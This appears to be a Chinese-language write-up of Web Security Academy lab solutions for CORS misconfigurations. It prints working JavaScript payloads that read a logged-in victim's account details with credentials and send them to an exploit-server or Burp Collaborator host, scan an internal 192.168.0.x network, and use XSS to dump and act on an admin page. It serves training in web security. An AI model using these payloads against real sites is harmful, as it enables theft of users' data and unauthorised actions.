具有基本原点反射的 CORS 漏洞
data:image/s3,"s3://crabby-images/b7a8c/b7a8c9e9e9ad3e62aea0c1c8809a1be37d276cc7" alt="image-20221206161641604"
可以看到获取用户敏感信息的请求 而这个请求是在我们登录之后它 自行访问的 当然也就是经过js代码出去的请求 并且观察响应头可以发现存在 Access-Control-Allow-Credentials: true
data:image/s3,"s3://crabby-images/1b9b0/1b9b015a27b53ca5a368d87215815e16f5297331" alt="image-20221206161634373"
我们这里随意添加一个 Origin头 观察响应 发信息接收了请求 并且由于存在 Access-Control-Allow-Credentials: true 代表了可以发送cookie 也就是验证用户的身份 那么这里就造成一个问题
data:image/s3,"s3://crabby-images/6095b/6095bbc1c8b6de49ab8309fc6350ac66b37c8047" alt="image-20221206161927068"
如果我们伪造一个服务器托管上恶意的js代码 模仿这个请求去访问用户的数据. 当然如果我们自己访问这个网站当然是没有危害的 但是我们可以使用和csrf类似的攻击方式 让受害者去访问这个页面 接着我们就可以拿到受害者的敏感信息
<script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ae800580338a827c0002eb900e000ce.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener(){ location='/log?key='+this.responseText; }
</script>
|
data:image/s3,"s3://crabby-images/b9d62/b9d62ec4988e0c730fb1c5e9cafaf11eb53c0abd" alt="image-20221206194111106"
data:image/s3,"s3://crabby-images/0ac84/0ac84e736c5cd476e690df12f8e14a8e62b37948" alt="image-20221206194210430"
data:image/s3,"s3://crabby-images/f676b/f676b089a45631e7bd0d2ad23abab8097ca45acb" alt="image-20221206194225912"
具有可信空源的 CORS 漏洞
data:image/s3,"s3://crabby-images/b3318/b331859b9c1f47bc3c6c36feebb626dc1c322089" alt="image-20221206201747094"
data:image/s3,"s3://crabby-images/a21ef/a21efa5a33f21ba58aee147a4ed56ebf5eb44271" alt="image-20221206201739657"
data:image/s3,"s3://crabby-images/3f71f/3f71f57c79272b2175d186d4035bbebff91f32e9" alt="image-20221206201914630"
直接添加origin请求发现不支持请求
data:image/s3,"s3://crabby-images/6cae6/6cae69bdea76cc75700f995510b469257f90954f" alt="image-20221206202737903"
但是当添加 null 却是可以接受的
这里使用的是iframe沙箱
<iframe sandbox="allow-scripts allow-top-navigation allwo-forms" srcdoc="<script> <!-- 表示页面可以执行脚本 导航到顶层页面 和提交表单 --> <!--srcdoc 表示用来指定嵌入html页面的内容--> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0a2d001503eba684c0b1730100eb00ba.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='https://exploit-0a1a004303dba6ccc0e475c001a100c7.exploit-server.net/log?key='+encodeURIComponent(this.responseText); }; </script>"></iframe>
|
data:image/s3,"s3://crabby-images/18aba/18aba12be8b9446aec4b15c278dfb80f7f0604c7" alt="image-20221206203618482"
data:image/s3,"s3://crabby-images/5f527/5f527d380b5ba1655c0dbf85cdc8853d4c081201" alt="image-20221206203643923"
data:image/s3,"s3://crabby-images/afd3b/afd3bc41e65f8e9391196bebc054f965e13435fe" alt="image-20221206203723440"
具有受信任的不安全协议的 CORS 漏洞
data:image/s3,"s3://crabby-images/029e2/029e2f9fed8e248e213442a95e54e3f55f7e95f1" alt="image-20221206203818518"
当请求是任意子域时可以接受
data:image/s3,"s3://crabby-images/6845c/6845caad94a41cc4665c9054d74cd902509d1a5b" alt="image-20221206205425371"
当 Check stock时会访问子域
data:image/s3,"s3://crabby-images/df1c9/df1c9b31fdf31d333314c036a0ea8099a80d3422" alt="image-20221206210749680"
data:image/s3,"s3://crabby-images/ee1b3/ee1b33afbabd0f70a2f15fddcd4bf8e4da1945d3" alt="image-20221206210907208"
子域中的 productid参数存在 xss
<script> document.location="http://stock.0acc005803aafe94c15409ff00bb0061.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0acc005803aafe94c15409ff00bb0061.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0ac100230340fe4cc1930b1501970039.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1" </script>
|
data:image/s3,"s3://crabby-images/78bc5/78bc5597fd5526c7ad5522f783e210b45864157b" alt="image-20221206212019417"
data:image/s3,"s3://crabby-images/f8c83/f8c83bd01c4e3010b57a2fd1bc89d5a0a2cb5192" alt="image-20221206211949575"
data:image/s3,"s3://crabby-images/55f7a/55f7acf22cabc76b57af7ea862d4da940ef79c58" alt="image-20221206212007015"
具有内部网络枢轴攻击的 CORS 漏洞
data:image/s3,"s3://crabby-images/0c80c/0c80ca1ab47709dc75688dd5a2566d87b7cadaca" alt="image-20221206212651215"
这里的意思大概就是只有 内网的域才能无限制的 访问敏感信息
data:image/s3,"s3://crabby-images/e2984/e2984b15cecd3b5107b98e61b69a3ebc34230943" alt="image-20221206230806673"
data:image/s3,"s3://crabby-images/cf312/cf312ea454fa4acd0ecd7f2fd98acc29916665c6" alt="image-20221207000630494"
<script> var q = [], collaboratorURL = 'http://$collaboratorPayload';
for (i = 1; i <= 255; i++) { q.push(function (url) { return function (wait) { fetchUrl(url, wait); } }('http://192.168.0.' + i + ':8080')); }
for (i = 1; i <= 20; i++) { if (q.length) q.shift()(i * 100); }
function fetchUrl(url, wait) { var controller = new AbortController(), signal = controller.signal; fetch(url, {signal}).then(r => r.text().then(text => { location = collaboratorURL + '?ip=' + url.replace(/^http:\/\//, '') + '&code=' + encodeURIComponent(text) + '&' + Date.now(); })) .catch(e => { if (q.length) { q.shift()(wait); } }); setTimeout(x => { controller.abort(); if (q.length) { q.shift()(wait); } }, wait); } </script>
|
data:image/s3,"s3://crabby-images/d8264/d82644fa4c892102f80ff68ca9be89d8f086c302" alt="image-20221207004530546"
这个脚本用来扫描内网存活 ip 当然 这个脚本的前提是 该受害者是在网站的内网环境中的 也就是说这个脚本我们是直接发给网站管理员的
现在我们已经获得了 网站的内网ip但是在这里呢 我们可以看到这个 网站是处于未登录的状态,我们通过cors并不能带有cookie的访问信息 也就是需要寻找 xss漏洞去进一步利用
data:image/s3,"s3://crabby-images/a5667/a5667abb4242138a1f1daf475b85835309127d96" alt="image-20221207004602255"
这里是去测试 网站的username是否存在 xss漏洞的
<script> function xss(url, text, vector) { location = url + '/login?time='+Date.now()+'&username='+encodeURIComponent(vector)+'&password=test&csrf='+text.match(/csrf" value="([^"]+)"/)[1];
}
function fetchUrl(url, collaboratorURL){ fetch(url).then(r => r.text().then(text => { xss(url, text, '"><img src='+collaboratorURL+'?foundXSS=1>'); })) }
fetchUrl("http://192.168.0.77:8080", "http://p7xiq4ibj3fr6bawenrcyrjlyc44st.burpcollaborator.net"); </script>
|
data:image/s3,"s3://crabby-images/adb47/adb47b1f04bffcfcf455caf7a103aca0ab4412a9" alt="image-20221207004946672"
<script> function xss(url, text, vector) { location = url + '/login?time='+Date.now()+'&username='+encodeURIComponent(vector)+'&password=test&csrf='+text.match(/csrf" value="([^"]+)"/)[1]; }
function fetchUrl(url, collaboratorURL){ fetch(url).then(r=>r.text().then(text=> { xss(url, text, '"><iframe src=/admin onload="new Image().src=\''+collaboratorURL+'?code=\'+encodeURIComponent(this.contentWindow.document.body.innerHTML)">'); } )) }
fetchUrl("http://192.168.0.77:8080", "http://p7xiq4ibj3fr6bawenrcyrjlyc44st.burpcollaborator.net"); </script>
|
data:image/s3,"s3://crabby-images/95801/958017b7cfcbe7d5e47d2265d64f9a00d85a53a2" alt="image-20221207005233736"
这里可以发现删除页面的form表单
data:image/s3,"s3://crabby-images/93613/936131ef24da4aef323ad1ef5869a4ac4cbe1436" alt="image-20221207005343726"
构造xss提交form表单
<script> function xss(url, text, vector) { location = url + '/login?time='+Date.now()+'&username='+encodeURIComponent(vector)+'&password=test&csrf='+text.match(/csrf" value="([^"]+)"/)[1]; }
function fetchUrl(url){ fetch(url).then(r=>r.text().then(text=> { xss(url, text, '"><iframe src=/admin onload="var f=this.contentWindow.document.forms[0];if(f.username)f.username.value=\'carlos\',f.submit()">'); } )) }
fetchUrl("http://192.168.0.77:8080"); </script>
|
data:image/s3,"s3://crabby-images/5b5d5/5b5d506a433dc873e0c08c5c3798b6d8e3d869dc" alt="image-20221207005537026"